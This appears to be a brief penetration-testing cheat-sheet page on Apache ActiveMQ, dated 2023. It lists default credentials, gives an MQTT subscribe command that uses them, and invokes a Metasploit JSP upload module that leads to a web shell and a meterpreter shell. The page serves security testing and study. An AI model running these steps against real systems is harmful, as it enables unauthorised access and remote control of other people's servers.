Apache ActiveMQ Pentesting
Last modified: 2023-02-23
Web
Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.
Default Credentials
admin:admin
Interaction with MQTT
If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client.
Subscribe to a Topic
# -h: Host
# -t: Topic name
# -V: MQTT protocol version (5, 31, 311)
mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
Web Shell by File Upload JSP
ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file.
msfconsole
msf> use exploit/multi/http/apache_activemq_upload_jsp
msf> set ...
msf> run
meterpreter> shell